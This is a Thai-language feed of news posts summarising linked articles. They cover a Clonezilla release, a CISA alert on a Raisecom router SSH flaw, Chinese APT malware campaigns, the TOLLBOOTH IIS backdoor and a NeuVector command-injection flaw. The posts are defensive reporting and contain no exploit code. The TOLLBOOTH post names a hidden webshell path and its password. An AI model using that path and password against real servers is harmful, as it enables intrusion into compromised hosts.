    เพิ่มตัวเลือก -uoab ใน UI แบบข้อความ
    ปรับ locale และ keymap ให้เลือกจาก shell login ด้วย fbterm
    ปรับปรุง ocs-iso-2-onie, ocs-cvt-dev, ocs-live-swap-kernel
    เพิ่มการรองรับ CPU architecture ในชื่อไฟล์ ISO/ZIP
    ปรับปรุงการแสดงผลของ ocs-scan-disk และ ocs-get-dev-info

    แพ็กเกจและระบบพื้นฐาน
    เพิ่มแพ็กเกจ atd, cron, upower, dhcpcd-base
    ใช้ Debian Sid (ณ วันที่ 17 ต.ค. 2025) เป็นฐานระบบ
    อัปเดต Partclone เป็นเวอร์ชัน 0.3.38 (แก้บั๊กเกี่ยวกับ btrfs)
    ปรับ grub.cfg ให้ใช้ efitextmode 0
    เพิ่มกลไกตั้งค่า timezone จาก BIOS หากไม่มีอินเทอร์เน็ต

    https://9to5linux.com/clonezilla-live-3-3-0-33-adds-support-for-cloning-mtd-block-and-emmc-boot-devices
    💾 “Clonezilla Live 3.3.0-33 มาแล้ว! รองรับการโคลน MTD และ eMMC พร้อมเครื่องมือใหม่เพียบ” Clonezilla Live เวอร์ชัน 3.3.0-33 เพิ่งเปิดตัว โดยเป็นระบบ live OS สำหรับการโคลนดิสก์และพาร์ทิชันที่อิงจาก Debian และใช้ Linux kernel 6.16 จุดเด่นของเวอร์ชันนี้คือการเพิ่มการรองรับการโคลนอุปกรณ์ MTD block และ eMMC boot ในโหมดผู้เชี่ยวชาญ (expert mode) ซึ่งเป็นประโยชน์มากสำหรับงาน embedded system และอุปกรณ์ IoT นอกจากนี้ยังมีเครื่องมือใหม่ชื่อว่า ocs-blkdev-sorter ที่ช่วยให้ udev สร้าง alias block device ใน /dev/ocs-disks/ ได้สะดวกขึ้น และ ocs-live-time-sync สำหรับซิงค์เวลาในระบบผ่าน ocs-live-netcfg ยังมีการเพิ่มตัวเลือก -uoab ใน ocs-sr และ ocs-live-feed-img เพื่อให้เลือก alias block device ได้จาก UI แบบข้อความ และเครื่องมือใหม่อีกหลายตัว เช่น ocs-cmd-screen-sample, ocs-live-gen-ubrd, และ ocs-blk-dev-info ที่ให้ข้อมูล block device ในรูปแบบ JSON ด้านระบบยังมีการเพิ่มแพ็กเกจสำคัญ เช่น atd, cron, upower, และ dhcpcd-base รวมถึงปรับปรุงการตั้งค่า locale และ keymap ให้เลือกได้จาก shell login โดยใช้ fbterm เป็นค่าเริ่มต้น สุดท้าย Clonezilla Live 3.3.0-33 ยังอัปเดตสคริปต์ต่าง ๆ เช่น ocs-iso-2-onie, ocs-cvt-dev, และ ocs-live-swap-kernel เพื่อรองรับการใช้งานที่ซับซ้อนมากขึ้น พร้อมปรับปรุงประสิทธิภาพและแก้บั๊กหลายจุด ✅ ความสามารถใหม่ใน Clonezilla Live 3.3.0-33 ➡️ รองรับการโคลน MTD block และ eMMC boot device ใน expert mode ➡️ เพิ่ม ocs-blkdev-sorter สำหรับสร้าง alias block device ➡️ เพิ่ม ocs-live-time-sync สำหรับซิงค์เวลา ➡️ เพิ่ม ocs-cmd-screen-sample และ ocs-live-gen-ubrd ➡️ เพิ่ม ocs-blk-dev-info สำหรับแสดงข้อมูล block device แบบ JSON ✅ การปรับปรุงระบบและ UI ➡️ เพิ่มตัวเลือก -uoab ใน UI แบบข้อความ ➡️ ปรับ locale และ keymap ให้เลือกจาก shell login ด้วย fbterm ➡️ ปรับปรุง ocs-iso-2-onie, ocs-cvt-dev, ocs-live-swap-kernel ➡️ เพิ่มการรองรับ CPU architecture ในชื่อไฟล์ ISO/ZIP ➡️ ปรับปรุงการแสดงผลของ ocs-scan-disk และ ocs-get-dev-info ✅ แพ็กเกจและระบบพื้นฐาน ➡️ เพิ่มแพ็กเกจ atd, cron, upower, dhcpcd-base ➡️ ใช้ Debian Sid (ณ วันที่ 17 ต.ค. 2025) เป็นฐานระบบ ➡️ อัปเดต Partclone เป็นเวอร์ชัน 0.3.38 (แก้บั๊กเกี่ยวกับ btrfs) ➡️ ปรับ grub.cfg ให้ใช้ efitextmode 0 ➡️ เพิ่มกลไกตั้งค่า timezone จาก BIOS หากไม่มีอินเทอร์เน็ต https://9to5linux.com/clonezilla-live-3-3-0-33-adds-support-for-cloning-mtd-block-and-emmc-boot-devices
    9TO5LINUX.COM
    Clonezilla Live 3.3.0-33 Adds Support for Cloning MTD Block and eMMC Boot Devices - 9to5Linux
    Clonezilla Live 3.3.0-33 open-source and free disk cloning/imaging tool is now available for download with various changes and updated components.
    0 Comments 0 Shares 87 Views 0 Reviews
  • “CISA เตือนช่องโหว่ Raisecom RAX701-GC – SSH เข้า root ได้โดยไม่ต้องยืนยันตัวตน!”

    CISA ออกประกาศเตือนช่องโหว่ร้ายแรงในเราเตอร์ Raisecom รุ่น RAX701-GC ที่ใช้ในระบบอุตสาหกรรมและโทรคมนาคม โดยช่องโหว่นี้มีรหัสว่า CVE-2025-11534 และได้คะแนน CVSS สูงถึง 9.8 ซึ่งถือว่า “วิกฤต” เพราะเปิดให้ผู้โจมตีสามารถเข้าถึง shell ของระบบด้วยสิทธิ์ root โดยไม่ต้องยืนยันตัวตนผ่าน SSH เลย

    ช่องโหว่นี้เกิดจากการที่อุปกรณ์อนุญาตให้สร้าง session SSH ได้โดยไม่ต้องผ่านขั้นตอนการยืนยันตัวตน ซึ่งผิดหลักการของระบบความปลอดภัยอย่างร้ายแรง โดย CISA จัดช่องโหว่นี้ไว้ในหมวด CWE-288: Authentication Bypass Using an Alternate Path or Channel

    อุปกรณ์ที่ได้รับผลกระทบคือ Raisecom RAX701-GC-WP-01 ที่ใช้ firmware เวอร์ชัน P200R002C52 และ P200R002C53 ซึ่งรวมถึงเวอร์ชัน 5.5.13_20180720, 5.5.27_20190111 และ 5.5.36_20190709

    ช่องโหว่นี้ถูกค้นพบโดย HD Moore และ Tod Beardsley จาก runZero และถูกแจ้งไปยัง CISA เพื่อเปิดเผยอย่างเป็นทางการ แต่ทาง Raisecom ยังไม่ตอบรับหรือออกแพตช์ใด ๆ ทำให้ผู้ดูแลระบบต้องใช้วิธีป้องกันเชิงเครือข่าย เช่น segmentation และ firewall เพื่อจำกัดการเข้าถึง

    แม้ยังไม่มีรายงานการโจมตีจริง แต่ CISA เตือนว่าเนื่องจากช่องโหว่นี้สามารถใช้จากระยะไกลได้ง่าย และให้สิทธิ์สูงสุด จึงควรรีบดำเนินการป้องกันทันที

    รายละเอียดช่องโหว่ CVE-2025-11534
    เกิดจากการ bypass authentication ใน SSH
    ผู้โจมตีสามารถเข้าถึง shell ด้วยสิทธิ์ root โดยไม่ต้อง login
    ได้คะแนน CVSS v3.1 สูงถึง 9.8
    จัดอยู่ในหมวด CWE-288 โดย CISA
    ส่งผลกระทบต่อ Raisecom RAX701-GC-WP-01 firmware หลายเวอร์ชัน

    การค้นพบและการเปิดเผย
    ค้นพบโดย HD Moore และ Tod Beardsley จาก runZero
    แจ้งไปยัง CISA เพื่อเปิดเผยอย่างเป็นทางการ
    Raisecom ยังไม่ตอบรับหรือออกแพตช์ใด ๆ
    ผู้ดูแลระบบต้องใช้วิธีป้องกันเชิงเครือข่ายแทน

    แนวทางการป้องกันจาก CISA
    แยกเครือข่ายควบคุมออกจากเครือข่ายธุรกิจ
    ใช้ firewall เพื่อจำกัดการเข้าถึงจากภายนอก
    ใช้ VPN ที่ปลอดภัยและอัปเดตอยู่เสมอ
    ตรวจสอบการเชื่อมต่อ SSH ที่ไม่ได้รับอนุญาต
    เฝ้าระวังพฤติกรรมผิดปกติจากอุปกรณ์ Raisecom

    https://securityonline.info/cisa-warns-critical-raisecom-router-flaw-cve-2025-11534-cvss-9-8-allows-unauthenticated-root-ssh-access/
    🚨 “CISA เตือนช่องโหว่ Raisecom RAX701-GC – SSH เข้า root ได้โดยไม่ต้องยืนยันตัวตน!” CISA ออกประกาศเตือนช่องโหว่ร้ายแรงในเราเตอร์ Raisecom รุ่น RAX701-GC ที่ใช้ในระบบอุตสาหกรรมและโทรคมนาคม โดยช่องโหว่นี้มีรหัสว่า CVE-2025-11534 และได้คะแนน CVSS สูงถึง 9.8 ซึ่งถือว่า “วิกฤต” เพราะเปิดให้ผู้โจมตีสามารถเข้าถึง shell ของระบบด้วยสิทธิ์ root โดยไม่ต้องยืนยันตัวตนผ่าน SSH เลย ช่องโหว่นี้เกิดจากการที่อุปกรณ์อนุญาตให้สร้าง session SSH ได้โดยไม่ต้องผ่านขั้นตอนการยืนยันตัวตน ซึ่งผิดหลักการของระบบความปลอดภัยอย่างร้ายแรง โดย CISA จัดช่องโหว่นี้ไว้ในหมวด CWE-288: Authentication Bypass Using an Alternate Path or Channel อุปกรณ์ที่ได้รับผลกระทบคือ Raisecom RAX701-GC-WP-01 ที่ใช้ firmware เวอร์ชัน P200R002C52 และ P200R002C53 ซึ่งรวมถึงเวอร์ชัน 5.5.13_20180720, 5.5.27_20190111 และ 5.5.36_20190709 ช่องโหว่นี้ถูกค้นพบโดย HD Moore และ Tod Beardsley จาก runZero และถูกแจ้งไปยัง CISA เพื่อเปิดเผยอย่างเป็นทางการ แต่ทาง Raisecom ยังไม่ตอบรับหรือออกแพตช์ใด ๆ ทำให้ผู้ดูแลระบบต้องใช้วิธีป้องกันเชิงเครือข่าย เช่น segmentation และ firewall เพื่อจำกัดการเข้าถึง แม้ยังไม่มีรายงานการโจมตีจริง แต่ CISA เตือนว่าเนื่องจากช่องโหว่นี้สามารถใช้จากระยะไกลได้ง่าย และให้สิทธิ์สูงสุด จึงควรรีบดำเนินการป้องกันทันที ✅ รายละเอียดช่องโหว่ CVE-2025-11534 ➡️ เกิดจากการ bypass authentication ใน SSH ➡️ ผู้โจมตีสามารถเข้าถึง shell ด้วยสิทธิ์ root โดยไม่ต้อง login ➡️ ได้คะแนน CVSS v3.1 สูงถึง 9.8 ➡️ จัดอยู่ในหมวด CWE-288 โดย CISA ➡️ ส่งผลกระทบต่อ Raisecom RAX701-GC-WP-01 firmware หลายเวอร์ชัน ✅ การค้นพบและการเปิดเผย ➡️ ค้นพบโดย HD Moore และ Tod Beardsley จาก runZero ➡️ แจ้งไปยัง CISA เพื่อเปิดเผยอย่างเป็นทางการ ➡️ Raisecom ยังไม่ตอบรับหรือออกแพตช์ใด ๆ ➡️ ผู้ดูแลระบบต้องใช้วิธีป้องกันเชิงเครือข่ายแทน ✅ แนวทางการป้องกันจาก CISA ➡️ แยกเครือข่ายควบคุมออกจากเครือข่ายธุรกิจ ➡️ ใช้ firewall เพื่อจำกัดการเข้าถึงจากภายนอก ➡️ ใช้ VPN ที่ปลอดภัยและอัปเดตอยู่เสมอ ➡️ ตรวจสอบการเชื่อมต่อ SSH ที่ไม่ได้รับอนุญาต ➡️ เฝ้าระวังพฤติกรรมผิดปกติจากอุปกรณ์ Raisecom https://securityonline.info/cisa-warns-critical-raisecom-router-flaw-cve-2025-11534-cvss-9-8-allows-unauthenticated-root-ssh-access/
    SECURITYONLINE.INFO
    CISA Warns: Critical Raisecom Router Flaw (CVE-2025-11534, CVSS 9.8) Allows Unauthenticated Root SSH Access
    CISA issued an alert for a Critical (CVSS 9.8) Auth Bypass flaw (CVE-2025-11534) in Raisecom RAX701-GC routers, allowing unauthenticated root shell via SSH. The vendor has not yet responded with a patch.
    0 Comments 0 Shares 95 Views 0 Reviews
  • “Symantec แฉแคมเปญจารกรรมจีน – ใช้ Zingdoor, ShadowPad และ KrustyLoader เจาะหน่วยงานทั่วโลก!”

    Symantec เปิดเผยแคมเปญจารกรรมไซเบอร์ระดับโลกที่มีความเชื่อมโยงกับกลุ่ม APT ของจีนหลายกลุ่ม โดยพบการใช้เครื่องมือมัลแวร์ที่ซับซ้อน ได้แก่ Zingdoor, ShadowPad และ KrustyLoader ซึ่งเคยถูกใช้โดยกลุ่ม Glowworm (Earth Estries) และ UNC5221 มาก่อน

    แคมเปญนี้เจาะระบบของหน่วยงานรัฐบาลในอเมริกาใต้และมหาวิทยาลัยในสหรัฐฯ โดยใช้ช่องโหว่ใน SQL Server และ Apache HTTP เป็นจุดเริ่มต้น จากนั้นฝัง DLL อันตรายผ่าน binary ที่ดูเหมือนซอฟต์แวร์ของ Symantec เพื่อหลบการตรวจจับ

    Zingdoor เป็น backdoor ที่เขียนด้วย Go สามารถเก็บข้อมูลระบบ, อัปโหลด/ดาวน์โหลดไฟล์ และรันคำสั่งได้ โดยถูก sideload ผ่าน binary ของ Trend Micro เพื่อให้ดูเหมือนโปรแกรมปกติ

    ShadowPad เป็น Remote Access Trojan (RAT) แบบ modular ที่สามารถโหลดโมดูลใหม่ได้ตามต้องการ ใช้ DLL sideloading เพื่อซ่อนตัว และถูกใช้โดยหลายกลุ่ม APT ของจีน เช่น APT41, Blackfly และ Grayfly

    KrustyLoader เป็น dropper ที่เขียนด้วย Rust มีฟีเจอร์ anti-analysis และ self-delete ก่อนจะโหลด payload ขั้นที่สอง เช่น Sliver C2 framework ซึ่งใช้ควบคุมระบบจากระยะไกล

    นอกจากมัลแวร์เฉพาะทางแล้ว แฮกเกอร์ยังใช้เครื่องมือทั่วไปของ Windows เช่น Certutil, Procdump, Revsocks และ PetitPotam เพื่อขโมย credentials และยกระดับสิทธิ์ในระบบ

    Symantec ระบุว่าการโจมตีนี้เกี่ยวข้องกับการใช้ช่องโหว่ ToolShell ที่ Microsoft เคยรายงาน โดยพบว่ามีการใช้จากกลุ่มอื่นนอกเหนือจาก Budworm, Sheathminer และ Storm-2603 ซึ่งแสดงให้เห็นถึง ecosystem การโจมตีที่กว้างกว่าที่เคยคิด

    เครื่องมือมัลแวร์ที่ใช้ในแคมเปญ
    Zingdoor – backdoor เขียนด้วย Go ใช้ sideload ผ่าน Trend Micro
    ShadowPad – modular RAT ที่โหลดโมดูลใหม่ได้ ใช้ DLL sideloading
    KrustyLoader – Rust-based dropper ที่โหลด Sliver C2 framework
    ใช้เครื่องมือทั่วไปของ Windows เช่น Certutil, Revsocks, Procdump
    ใช้ PetitPotam เพื่อขโมย credentials จาก domain controller

    กลุ่ม APT ที่เกี่ยวข้อง
    Glowworm (Earth Estries), FamousSparrow
    UNC5221 – กลุ่มที่มีความเชื่อมโยงกับจีน
    APT41, Blackfly, Grayfly – ใช้ ShadowPad
    REF3927 – กลุ่มใหม่ที่ใช้ ToolShell ร่วมกับกลุ่มอื่น

    เป้าหมายของการโจมตี
    หน่วยงานรัฐบาลในอเมริกาใต้
    มหาวิทยาลัยในสหรัฐฯ
    ระบบ SharePoint ที่มีช่องโหว่
    เป้าหมายเชิงยุทธศาสตร์ที่มีข้อมูลสำคัญ
    สร้างการเข้าถึงระยะยาวและขโมยข้อมูลอย่างต่อเนื่อง

    https://securityonline.info/symantec-exposes-chinese-apt-overlap-zingdoor-shadowpad-and-krustyloader-used-in-global-espionage/
    🕵️‍♀️ “Symantec แฉแคมเปญจารกรรมจีน – ใช้ Zingdoor, ShadowPad และ KrustyLoader เจาะหน่วยงานทั่วโลก!” Symantec เปิดเผยแคมเปญจารกรรมไซเบอร์ระดับโลกที่มีความเชื่อมโยงกับกลุ่ม APT ของจีนหลายกลุ่ม โดยพบการใช้เครื่องมือมัลแวร์ที่ซับซ้อน ได้แก่ Zingdoor, ShadowPad และ KrustyLoader ซึ่งเคยถูกใช้โดยกลุ่ม Glowworm (Earth Estries) และ UNC5221 มาก่อน แคมเปญนี้เจาะระบบของหน่วยงานรัฐบาลในอเมริกาใต้และมหาวิทยาลัยในสหรัฐฯ โดยใช้ช่องโหว่ใน SQL Server และ Apache HTTP เป็นจุดเริ่มต้น จากนั้นฝัง DLL อันตรายผ่าน binary ที่ดูเหมือนซอฟต์แวร์ของ Symantec เพื่อหลบการตรวจจับ Zingdoor เป็น backdoor ที่เขียนด้วย Go สามารถเก็บข้อมูลระบบ, อัปโหลด/ดาวน์โหลดไฟล์ และรันคำสั่งได้ โดยถูก sideload ผ่าน binary ของ Trend Micro เพื่อให้ดูเหมือนโปรแกรมปกติ ShadowPad เป็น Remote Access Trojan (RAT) แบบ modular ที่สามารถโหลดโมดูลใหม่ได้ตามต้องการ ใช้ DLL sideloading เพื่อซ่อนตัว และถูกใช้โดยหลายกลุ่ม APT ของจีน เช่น APT41, Blackfly และ Grayfly KrustyLoader เป็น dropper ที่เขียนด้วย Rust มีฟีเจอร์ anti-analysis และ self-delete ก่อนจะโหลด payload ขั้นที่สอง เช่น Sliver C2 framework ซึ่งใช้ควบคุมระบบจากระยะไกล นอกจากมัลแวร์เฉพาะทางแล้ว แฮกเกอร์ยังใช้เครื่องมือทั่วไปของ Windows เช่น Certutil, Procdump, Revsocks และ PetitPotam เพื่อขโมย credentials และยกระดับสิทธิ์ในระบบ Symantec ระบุว่าการโจมตีนี้เกี่ยวข้องกับการใช้ช่องโหว่ ToolShell ที่ Microsoft เคยรายงาน โดยพบว่ามีการใช้จากกลุ่มอื่นนอกเหนือจาก Budworm, Sheathminer และ Storm-2603 ซึ่งแสดงให้เห็นถึง ecosystem การโจมตีที่กว้างกว่าที่เคยคิด ✅ เครื่องมือมัลแวร์ที่ใช้ในแคมเปญ ➡️ Zingdoor – backdoor เขียนด้วย Go ใช้ sideload ผ่าน Trend Micro ➡️ ShadowPad – modular RAT ที่โหลดโมดูลใหม่ได้ ใช้ DLL sideloading ➡️ KrustyLoader – Rust-based dropper ที่โหลด Sliver C2 framework ➡️ ใช้เครื่องมือทั่วไปของ Windows เช่น Certutil, Revsocks, Procdump ➡️ ใช้ PetitPotam เพื่อขโมย credentials จาก domain controller ✅ กลุ่ม APT ที่เกี่ยวข้อง ➡️ Glowworm (Earth Estries), FamousSparrow ➡️ UNC5221 – กลุ่มที่มีความเชื่อมโยงกับจีน ➡️ APT41, Blackfly, Grayfly – ใช้ ShadowPad ➡️ REF3927 – กลุ่มใหม่ที่ใช้ ToolShell ร่วมกับกลุ่มอื่น ✅ เป้าหมายของการโจมตี ➡️ หน่วยงานรัฐบาลในอเมริกาใต้ ➡️ มหาวิทยาลัยในสหรัฐฯ ➡️ ระบบ SharePoint ที่มีช่องโหว่ ➡️ เป้าหมายเชิงยุทธศาสตร์ที่มีข้อมูลสำคัญ ➡️ สร้างการเข้าถึงระยะยาวและขโมยข้อมูลอย่างต่อเนื่อง https://securityonline.info/symantec-exposes-chinese-apt-overlap-zingdoor-shadowpad-and-krustyloader-used-in-global-espionage/
    SECURITYONLINE.INFO
    Symantec Exposes Chinese APT Overlap: Zingdoor, ShadowPad, and KrustyLoader Used in Global Espionage
    Symantec exposed a complex Chinese APT network (Glowworm/UNC5221) deploying Zingdoor and ShadowPad across US/South American targets. The groups abuse DLL sideloading and PetitPotam for credential theft.
    0 Comments 0 Shares 103 Views 0 Reviews
  • “แฮกเกอร์จีนใช้คีย์ ASP.NET ที่หลุด – ฝัง TOLLBOOTH Backdoor และ Rootkit บน IIS Server ทั่วโลก!”

    Elastic Security Labs และ Texas A&M University System Cybersecurity เผยการค้นพบแคมเปญโจมตีจากกลุ่มแฮกเกอร์ที่พูดภาษาจีน ซึ่งใช้คีย์ ASP.NET ที่ถูกเปิดเผยต่อสาธารณะในการเจาะระบบ Microsoft IIS Server ที่ตั้งค่าผิดพลาด

    แฮกเกอร์ใช้คีย์ machineKey ที่หลุดจากเอกสาร Microsoft และ StackOverflow เพื่อสร้าง payload ที่สามารถ deserialization ผ่าน ViewState ได้ ทำให้สามารถรันคำสั่งบนเซิร์ฟเวอร์ได้โดยไม่ต้องยืนยันตัวตน

    หลังจากเจาะระบบได้แล้ว พวกเขาจะติดตั้ง backdoor ชื่อว่า TOLLBOOTH ซึ่งเป็น IIS module ที่มีความสามารถทั้ง SEO cloaking, webshell, และ command execution โดยมี webshell ซ่อนอยู่ที่ /mywebdll พร้อมรหัสผ่าน hack123456!

    TOLLBOOTH ยังสามารถแยกแยะระหว่าง bot ของ search engine กับผู้ใช้จริง เพื่อแสดงเนื้อหาหลอกลวงให้ bot เห็น (เพื่อดัน SEO) และ redirect ผู้ใช้ไปยังเว็บไซต์อันตราย ซึ่งเป็นเทคนิคที่เรียกว่า link farm network

    หากวิธีฝัง backdoor ล้มเหลว แฮกเกอร์จะใช้เครื่องมือ Remote Monitoring & Management (RMM) ชื่อ GotoHTTP เพื่อควบคุมเครื่องผ่านเบราว์เซอร์โดยตรง

    นอกจากนี้ยังพบ rootkit ระดับ kernel ที่ชื่อว่า HIDDENDRIVER ซึ่งดัดแปลงจากโครงการโอเพ่นซอร์สชื่อ “Hidden” โดยใช้เทคนิค DKOM (Direct Kernel Object Manipulation) เพื่อซ่อน process, ไฟล์ และ registry key จากเครื่องมือวิเคราะห์ระบบ

    การโจมตีนี้ถูกจัดกลุ่มเป็น REF3927 และพบว่ามีความเชื่อมโยงกับแคมเปญที่ Microsoft และ AhnLab เคยรายงานมาก่อน โดยมีเป้าหมายเป็นเซิร์ฟเวอร์ IIS กว่า 571 เครื่องทั่วโลก ยกเว้นในประเทศจีน ซึ่งสอดคล้องกับพฤติกรรมของกลุ่มแฮกเกอร์จีนที่มักหลีกเลี่ยงการโจมตีภายในประเทศตัวเอง

    วิธีการโจมตี
    ใช้คีย์ ASP.NET machineKey ที่ถูกเปิดเผยสู่สาธารณะ
    สร้าง ViewState payload เพื่อรันคำสั่งบน IIS Server
    ติดตั้ง TOLLBOOTH IIS module เป็น backdoor
    ใช้ GotoHTTP หากฝัง backdoor ไม่สำเร็จ
    ติดตั้ง rootkit HIDDENDRIVER เพื่อซ่อนการทำงาน

    ความสามารถของ TOLLBOOTH
    มี webshell ซ่อนอยู่ที่ /mywebdll พร้อมรหัสผ่าน
    รองรับการอัปโหลดไฟล์และรันคำสั่ง
    มี endpoint สำหรับ health check, debug และ clean
    มี SEO cloaking engine เพื่อหลอก bot และ redirect ผู้ใช้
    ใช้ JSON config จากเซิร์ฟเวอร์ควบคุม

    ความสามารถของ HIDDENDRIVER
    ใช้เทคนิค DKOM เพื่อซ่อน process, ไฟล์ และ registry
    มี companion app ชื่อ HIDDENCLI เขียนด้วยภาษาจีน
    ปรับปรุงจากโปรเจกต์ “Hidden” ด้วยฟีเจอร์ AMSI bypass และ whitelist process
    ซ่อนตัวจากเครื่องมืออย่าง Process Explorer ได้

    ขอบเขตของการโจมตี
    พบการติดเชื้อใน IIS Server อย่างน้อย 571 เครื่อง
    ครอบคลุมหลายอุตสาหกรรม เช่น การเงิน โลจิสติกส์ การศึกษา
    ไม่มีเหยื่อในประเทศจีน – สะท้อนการใช้ geofencing
    พบการติดตั้งซ้ำในหลายองค์กร แสดงว่าปัญหายังไม่ถูกแก้ที่ต้นเหตุ

    https://securityonline.info/chinese-hackers-exploit-exposed-asp-net-keys-to-deploy-tollbooth-iis-backdoor-and-kernel-rootkit/
    🕳️ “แฮกเกอร์จีนใช้คีย์ ASP.NET ที่หลุด – ฝัง TOLLBOOTH Backdoor และ Rootkit บน IIS Server ทั่วโลก!” Elastic Security Labs และ Texas A&M University System Cybersecurity เผยการค้นพบแคมเปญโจมตีจากกลุ่มแฮกเกอร์ที่พูดภาษาจีน ซึ่งใช้คีย์ ASP.NET ที่ถูกเปิดเผยต่อสาธารณะในการเจาะระบบ Microsoft IIS Server ที่ตั้งค่าผิดพลาด แฮกเกอร์ใช้คีย์ machineKey ที่หลุดจากเอกสาร Microsoft และ StackOverflow เพื่อสร้าง payload ที่สามารถ deserialization ผ่าน ViewState ได้ ทำให้สามารถรันคำสั่งบนเซิร์ฟเวอร์ได้โดยไม่ต้องยืนยันตัวตน หลังจากเจาะระบบได้แล้ว พวกเขาจะติดตั้ง backdoor ชื่อว่า TOLLBOOTH ซึ่งเป็น IIS module ที่มีความสามารถทั้ง SEO cloaking, webshell, และ command execution โดยมี webshell ซ่อนอยู่ที่ /mywebdll พร้อมรหัสผ่าน hack123456! TOLLBOOTH ยังสามารถแยกแยะระหว่าง bot ของ search engine กับผู้ใช้จริง เพื่อแสดงเนื้อหาหลอกลวงให้ bot เห็น (เพื่อดัน SEO) และ redirect ผู้ใช้ไปยังเว็บไซต์อันตราย ซึ่งเป็นเทคนิคที่เรียกว่า link farm network หากวิธีฝัง backdoor ล้มเหลว แฮกเกอร์จะใช้เครื่องมือ Remote Monitoring & Management (RMM) ชื่อ GotoHTTP เพื่อควบคุมเครื่องผ่านเบราว์เซอร์โดยตรง นอกจากนี้ยังพบ rootkit ระดับ kernel ที่ชื่อว่า HIDDENDRIVER ซึ่งดัดแปลงจากโครงการโอเพ่นซอร์สชื่อ “Hidden” โดยใช้เทคนิค DKOM (Direct Kernel Object Manipulation) เพื่อซ่อน process, ไฟล์ และ registry key จากเครื่องมือวิเคราะห์ระบบ การโจมตีนี้ถูกจัดกลุ่มเป็น REF3927 และพบว่ามีความเชื่อมโยงกับแคมเปญที่ Microsoft และ AhnLab เคยรายงานมาก่อน โดยมีเป้าหมายเป็นเซิร์ฟเวอร์ IIS กว่า 571 เครื่องทั่วโลก ยกเว้นในประเทศจีน ซึ่งสอดคล้องกับพฤติกรรมของกลุ่มแฮกเกอร์จีนที่มักหลีกเลี่ยงการโจมตีภายในประเทศตัวเอง ✅ วิธีการโจมตี ➡️ ใช้คีย์ ASP.NET machineKey ที่ถูกเปิดเผยสู่สาธารณะ ➡️ สร้าง ViewState payload เพื่อรันคำสั่งบน IIS Server ➡️ ติดตั้ง TOLLBOOTH IIS module เป็น backdoor ➡️ ใช้ GotoHTTP หากฝัง backdoor ไม่สำเร็จ ➡️ ติดตั้ง rootkit HIDDENDRIVER เพื่อซ่อนการทำงาน ✅ ความสามารถของ TOLLBOOTH ➡️ มี webshell ซ่อนอยู่ที่ /mywebdll พร้อมรหัสผ่าน ➡️ รองรับการอัปโหลดไฟล์และรันคำสั่ง ➡️ มี endpoint สำหรับ health check, debug และ clean ➡️ มี SEO cloaking engine เพื่อหลอก bot และ redirect ผู้ใช้ ➡️ ใช้ JSON config จากเซิร์ฟเวอร์ควบคุม ✅ ความสามารถของ HIDDENDRIVER ➡️ ใช้เทคนิค DKOM เพื่อซ่อน process, ไฟล์ และ registry ➡️ มี companion app ชื่อ HIDDENCLI เขียนด้วยภาษาจีน ➡️ ปรับปรุงจากโปรเจกต์ “Hidden” ด้วยฟีเจอร์ AMSI bypass และ whitelist process ➡️ ซ่อนตัวจากเครื่องมืออย่าง Process Explorer ได้ ✅ ขอบเขตของการโจมตี ➡️ พบการติดเชื้อใน IIS Server อย่างน้อย 571 เครื่อง ➡️ ครอบคลุมหลายอุตสาหกรรม เช่น การเงิน โลจิสติกส์ การศึกษา ➡️ ไม่มีเหยื่อในประเทศจีน – สะท้อนการใช้ geofencing ➡️ พบการติดตั้งซ้ำในหลายองค์กร แสดงว่าปัญหายังไม่ถูกแก้ที่ต้นเหตุ https://securityonline.info/chinese-hackers-exploit-exposed-asp-net-keys-to-deploy-tollbooth-iis-backdoor-and-kernel-rootkit/
    SECURITYONLINE.INFO
    Chinese Hackers Exploit Exposed ASP.NET Keys to Deploy TOLLBOOTH IIS Backdoor and Kernel Rootkit
    Elastic exposed Chinese threat actors exploiting public ASP.NET machine keys to deploy TOLLBOOTH IIS backdoor and HIDDENDRIVER kernel rootkit. The malware performs stealthy SEO cloaking.
    0 Comments 0 Shares 109 Views 0 Reviews
  • “ช่องโหว่ CVE-2025-54469 ใน NeuVector – เสี่ยง RCE ระดับสูงสุด! แฮกเกอร์อาจสั่งรันคำสั่งในคอนเทนเนอร์ได้ทันที”

    SUSE Rancher Security ออกประกาศเตือนช่องโหว่ร้ายแรงใน NeuVector ซึ่งเป็นแพลตฟอร์มรักษาความปลอดภัยสำหรับ container โดยช่องโหว่นี้มีรหัสว่า CVE-2025-54469 และได้คะแนน CVSS เต็ม 10.0 หมายถึงความรุนแรงระดับสูงสุด

    ช่องโหว่นี้เกิดจากการที่ Enforcer container ใช้ environment variables ชื่อ CLUSTER_RPC_PORT และ CLUSTER_LAN_PORT เพื่อสร้างคำสั่ง shell ผ่านฟังก์ชัน popen() โดยไม่มีการตรวจสอบหรือ sanitize ค่าที่รับเข้ามาเลย ทำให้แฮกเกอร์สามารถ inject คำสั่งอันตรายเข้าไปได้โดยตรง

    เมื่อ Enforcer หยุดทำงาน มันจะตรวจสอบสถานะของ subprocess เช่น Consul โดยรันคำสั่ง shell ที่ประกอบจาก environment variables เหล่านี้ หากแฮกเกอร์สามารถควบคุมค่าตัวแปรได้ ก็สามารถสั่งรันคำสั่งใด ๆ ในระบบได้ทันที

    ผลกระทบคือแฮกเกอร์อาจได้สิทธิ์ root ภายใน container, เคลื่อนไหวไปยัง container อื่นใน Kubernetes cluster, หรือแม้แต่ปิดระบบ runtime security enforcement ของ NeuVector ได้เลย

    SUSE ได้ออกแพตช์ในเวอร์ชัน NeuVector v5.4.7 ซึ่งมีการตรวจสอบค่าตัวแปรก่อนนำไปใช้ในคำสั่ง shell แล้ว ผู้ใช้ควรอัปเดตทันทีเพื่อป้องกันการโจมตี

    รายละเอียดช่องโหว่ CVE-2025-54469
    เกิดจากการใช้ environment variables โดยไม่ sanitize
    ใช้ในคำสั่ง shell ผ่านฟังก์ชัน popen()
    ส่งผลให้เกิด command injection ได้
    อยู่ใน Enforcer container ของ NeuVector
    ได้คะแนน CVSS เต็ม 10.0

    ผลกระทบจากช่องโหว่
    แฮกเกอร์อาจได้สิทธิ์ root ภายใน container
    เคลื่อนไหวไปยัง container อื่นใน cluster ได้
    ปิดระบบ runtime security enforcement ของ NeuVector
    อาจนำไปสู่การโจมตีระดับ cluster-wide
    เสี่ยงต่อการถูกยึดระบบ DevSecOps ทั้งชุด

    การตอบสนองจาก SUSE
    ออกแพตช์ใน NeuVector v5.4.7
    เพิ่มการตรวจสอบค่าตัวแปรก่อนใช้ใน shell command
    แนะนำให้อัปเดตทันทีเพื่อป้องกันการโจมตี
